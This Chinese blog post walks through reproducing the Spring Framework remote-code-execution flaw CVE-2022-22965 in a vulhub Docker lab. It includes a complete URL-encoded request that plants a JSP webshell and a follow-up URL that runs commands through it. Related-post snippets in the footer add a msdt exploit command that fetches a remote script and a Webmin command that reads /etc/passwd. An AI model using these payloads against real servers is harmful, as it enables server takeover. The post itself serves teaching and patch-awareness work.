CVE-2022-22965:Spring远程代码执行漏洞复现

最新推荐文章于 2024-05-31 15:27:54 发布
最新推荐文章于 2024-05-31 15:27:54 发布
阅读量896 收藏 30
点赞数 9
文章标签: spring java 后端 web安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44862511/article/details/136742911
版权

一.Spring Framework框架的概念

Spring框架(Framework)是一个开源的轻量级J2EE应用程序开发框架,提供了IOC、AOP及MVC等功能,解决了程序人员在开发中遇到的常见问题,提高了应用程序开发便捷度和软件系统构建效率。

二.漏洞原理

由于Spring框架历史漏洞修复代码存在缺陷,在 JDK 9 及以上版本环境下,远程攻击者可借助Tomcat中间件构造数据包修改日志文件,从而可在任意路径下写入Webshell等恶意文件,最终可导致执行任意代码控制服务器等危害。

三.影响版本

Spring Framework 5.3.X < 5.3.18
Spring Framework 5.2.X < 5.2.20

目前已知触发该漏洞需要满足以下条件:
1.使用 JDK9 及以上版本
2.Apache Tomcat 作为 Servlet 容器
3.打包为 WAR
4.使用 spring-webmvc 或 spring-webflux 的依赖

四.搭建环境

1.vulhub靶场下载

Vulhub - Docker-Compose file for vulnerability environment

docker-compose_免费高速下载|百度网盘-分享无限制 (baidu.com)

2.docker-compose下载地址

Releases · docker/compose · GitHub

docker-compose_免费高速下载|百度网盘-分享无限制 (baidu.com)

3.服务启动

一切都准备好之后就可以启动CVE-2022-22965 的环境了.

先cd到spring目录下的CVE-2022-22965里面,然后使用docker-compose启动环境.

docker-compose up -d                 #安装并启动环境

docker ps                         #查看当前正在运行的服务

可以看到spring的端口为8080

ip a         #查看IP      我的IP为192.168.128.141

在浏览器端输入 你的ip+端口8080 访问服务,如果显示页面正常显示内容 ,则表示服务搭建成功!

五.漏洞复现

1.验证

在URL后添加参数: /?name=Baby&age=3

http://192.168.128.141:8080/?name=Baby&age=3

2.注意事项

当你的靶场环境和BP在同一环境下时, 会占用端口, 从而无法抓包. 将端口进行修改即可.

3.写入文件

发送以下请求以更改 Apache Tomcat 中的日志记录配置并将日志写入 JSP 文件:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22p%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1

Host: 192.168.128.141:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: JSESSIONID=34586F002A5F125E0C3F9BBAC4C43F4D

Upgrade-Insecure-Requests: 1

BP抓包, 将第一行的URL替换为以下代码即可:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22p%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1

4.命令执行

访问传入的 JSP webshell , 并执行任意命令:

http://192.168.128.141:8080/tomcatwar.jsp?pwd=j&cmd=id     #这里注意写你自己的IP

六.修复建议

由于漏洞可能存在其他利用方式,可能会扩大影响程度,优先建议升级 Spring Framework 到安全版本

安全版本

Spring Framework = 5.3.18
Spring Framework = 5.2.20
及基于Spring Framework 5.3.18 的 Spring Boot 2.6.6 、Spring Boot 2.5.12

修复参考链接: 【安全通告】Spring Framework 远程代码执行漏洞风险通告(CVE-2022-22965)

文章参考:CVE-2022-22965:Spring远程代码执行漏洞-CSDN博客

徐长卿学网安
关注
  • 9
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 3773
CVE-2022-22965 Spring远程代码执行漏洞复现
CVE-2022-22965:Spring远程代码执行漏洞复现
xjh8023的博客
11-09 429
CVE-2022-22965:Spring远程代码执行漏洞复现&getshell骚操作
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
CVE-2020-8840 FasterXML / jackson-databind远程代码执行漏洞
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -d root@9460493fa985:/# passwd root Webmin>用户名= root,密码= root :high_voltage: root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d Creating network "cve-2019-15107_default" with the default driver Pullin
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
Spring RCE 0day高危漏洞预警(CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+)后续来了
罗小爬的技术宝书
04-01 1071
Spring官方发布了CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+声明以及最新的修复版本。
CVE-2022-22965Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965Spring Framework远程代码执行漏洞
CVE-2022-4510:Binwalk 远程代码执行漏洞
07-03
CVE-2022-4510:Binwalk 远程代码执行漏洞
CVE-2022-22965 GUItools单个图形化利用工具
04-06
3月31日,spring 官方通报了 Spring 相关框架存在远程代码执行漏洞,并在 5.3.18 和 5.2.20.RELEASE 中修复了该漏洞漏洞评级:严重 影响组件:org.springframework:spring-beans 影响版本:和 的Spring框架均...
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 2867
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5393
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
Spring RCE漏洞CVE-2022-22965复现JavaFx GUI图形化漏洞利用工具开发
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-29 1907
Spring RCE漏洞CVE-2022-22965复现JavaFx GUI图形化漏洞利用工具开发。CVE-2022-22965\Spring-Core-RCE核弹级别漏洞的rce图形化GUI一键利用工具,基于JavaFx开发,图形化操作更简单,提高效率。
SpringBoot 的 Java 代码配置(二)
xiaotu的博客
05-29 1090
因此,如果使用 HikariCP 只用声明你要用它就行,而声明要使用 Druid,你需要自己指定所使用的版本。上面的 DruidDataSource ,我们为其属性赋值时,它的四个属性都是简单类型属性,因此十分容易处理。但是,在 Spring 的容器中,Java Bean 可能会存在引用。在上面的 Druid 的配置中,数据库连接的四大属性值是在代码中『写死』的。而在 Java 代码配置中,通过 @Bean 方法的入参来表达 Bean 之间的引用关系。,所以,我们可以直接将自定义的配置项写在。
springboot基本使用十二(PageHelper分页查询)
最新发布
weixin_41670405的博客
05-31 279
startPage(page,pageSize)方法进行分页查询,这个方法需要传入两个参数,第一个参数为页码(page自定义名称),第二个为每页的数量(pageSize自定义名称)分页查询还得到数据总量。
java运行普通jar包和springboot对应的jar包中指定类的main方法
liaomingwu的专栏
05-30 229
这里分几种情况进行说明,包括普通jar包和springboot生成的jar包,运行默认启动类,运行默认启动类以外的指定类。
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值